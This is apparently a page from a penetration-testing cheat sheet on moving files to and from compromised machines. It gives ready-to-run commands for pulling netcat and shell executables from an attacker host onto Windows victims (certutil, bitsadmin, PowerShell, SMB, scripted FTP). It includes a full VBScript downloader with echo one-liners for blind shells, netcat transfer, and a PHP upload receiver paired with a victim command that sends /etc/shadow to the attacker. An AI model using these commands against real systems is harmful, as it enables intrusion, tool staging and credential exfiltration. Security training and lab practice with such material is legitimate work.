Transfer File

Windows

Download file from web server

bitsadmin /Transfer RoutineJob http://10.10.x.y/file.txt C:\windows\tasks\file.txt

HTTP Server

# kali
python3 -m http.server 80

# windows
[cmd] certutil.exe -urlcache -f http://<ip kali>/nc.exe nc.exe
[PS] Invoke-WebRequest -Uri "http://<ip kali>/nc.exe" -OutFile "C:\Windows\Tasks\nc.exe"

Impacket-smbserver

# kali linux
impacket-smbserver -smb2support -user test -password P@ssw0rd warrior `pwd`

# windows target
[PS] net use * \\192.168.45.198\warrior /user:test P@ssw0rd

or 

[cmd] net use * \\<kali ip>\warrior
[cmd] cd Z:\nc.exe

# windows target run [ctrl + r]
\\<kali ip>\warrior

FTP with Python

create ftp with python

## kali (attacker)
python -m pyftpdlib -p 21


## victim (windows)
[cmd] cd wmpub  
[cmd] echo open 192.168.45.207 21>>ftp.txt&echo USER anonymous>>ftp.txt&echo anonymous>>ftp.txt&echo bin>>ftp.txt&echo GET nc.exe>>ftp.txt&echo bye>>ftp.txt
[cmd] echo open 10.10.14.13 21> ftp.txt&echo USER anonymous >> ftp.txt&echo anonymous>> ftp.txt&echo bin>> ftp.txt&echo GET nc.exe >> ftp.txt&echo bye>> ftp.txt  

[cmd] ftp -v -n -s:ftp.txt

wget with VBScript

run wget.vbs

windows
./wget.vbs http://<attacker ip>/shell.exe shell.exe

kali
cscript wget.vbs http://<attacker ip>/shell.exe shell.exe

wget.vbs

strUrl = WScript.Arguments.Item(0) 
StrFile = WScript.Arguments.Item(1) 
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 
Const HTTPREQUEST_PROXYSETTING_PROXY = 2 
Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts 
 Err.Clear 
 Set http = Nothing 
 Set http = CreateObject("WinHttp.WinHttpRequest.5.1") 
 If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") 
 If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") 
 If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") 
 http.Open "GET", strURL, False 
 http.Send 
 varByteArray = http.ResponseBody 
 Set http = Nothing 
 Set fs = CreateObject("Scripting.FileSystemObject") 
 Set ts = fs.CreateTextFile(StrFile, True) 
 strData = "" 
 strBuffer = "" 
 For lngCounter = 0 to UBound(varByteArray) 
 ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) 
 Next 
 ts.Close

Non-Interactive command:

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo  Err.Clear >> wget.vbs
echo  Set http = Nothing >> wget.vbs
echo  Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo  If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo  If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo  If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo  http.Open "GET", strURL, False >> wget.vbs
echo  http.Send >> wget.vbs
echo  varByteArray = http.ResponseBody >> wget.vbs
echo  Set http = Nothing >> wget.vbs
echo  Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo  Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo  strData = "" >> wget.vbs
echo  strBuffer = "" >> wget.vbs
echo  For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo  ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo  Next >> wget.vbs
echo  ts.Close >> wget.vbs

Linux

netcat

#On the receiving end running,
nc -l -p 1234 > out.file 
# will begin listening on port 1234.

# On the sending end running,
nc -w 3 [destination] 1234 < out.file

Upload.php

Attacker Machine:

setup the php web server

/var/www/html/upload.php

<?php
$target_path = "uploads/";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
echo "Source=" . $_FILES['uploadedfile']['name'] . "<br />";
echo "Target path=" . $target_path . "<br />";
echo "Size=" . $_FILES['uploadedfile']['size'] . "<br />";
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file " . basename( $_FILES['uploadedfile']['name']) . " has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
?>

Power up the apache server

systemctl start apache2

Victim:

curl --form "uploadedfile=@/etc/shadow" http://<attacker ip>/upload.php

Python Simple Upload HTTP Server

run this in attacker machine, use for downloading the file and uploading the file from victim machine.

import cgi
import http.server
import socketserver
import os
from pathlib import Path

PORT = 8080
UPLOAD_DIRECTORY = "./uploaded"

class UploadHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/':
            self.send_response(200)
            self.send_header('Content-Type', 'text/html')
            self.end_headers()

            file_list_html = "<ul>"
            for filename in os.listdir(UPLOAD_DIRECTORY):
                file_list_html += f"<li><a href='/{UPLOAD_DIRECTORY}/{filename}'>{filename}</a></li>"
            file_list_html += "</ul>"

            self.wfile.write(f'''<!DOCTYPE html>
            <html>
            <head>
                <title>Files List</title>
            </head>
            <body>
                <h1>Files:</h1>
                {file_list_html}
                <form action="/upload" method="post" enctype="multipart/form-data">
                    Select file to upload: <input type="file" name="file" id="file">
                    <input type="submit" value="Upload" name="submit">
                </form>
            </body>
            </html>'''.encode())
        else:
            super().do_GET()

    def do_POST(self):
        if self.path == '/upload':
            form = cgi.FieldStorage(
                fp=self.rfile,
                headers=self.headers,
                environ={'REQUEST_METHOD': 'POST'}
            )
            file_item = form['file']

            if file_item.filename:
                file_path = Path(file_item.filename)
                upload_path = Path(UPLOAD_DIRECTORY) / file_path.name
                with open(upload_path, 'wb') as file:
                    file.write(file_item.file.read())
                self.send_response(303)  # Redirect with "See Other"
                self.send_header('Location', '/')  # Redirect to root directory
                self.end_headers()
            else:
                self.send_response(400)
                self.send_header('Content-Type', 'text/html')
                self.end_headers()
                self.wfile.write(b'<h1>No file was uploaded</h1>')

        else:
            super().do_POST()

if __name__ == "__main__":
    if not os.path.exists(UPLOAD_DIRECTORY):
        os.makedirs(UPLOAD_DIRECTORY)

    with socketserver.TCPServer(("", PORT), UploadHandler) as httpd:
        print(f"Serving at http://localhost:{PORT}")
        httpd.serve_forever()

PreviousPivot in a Case NextExfiltration

Last updated 3 months ago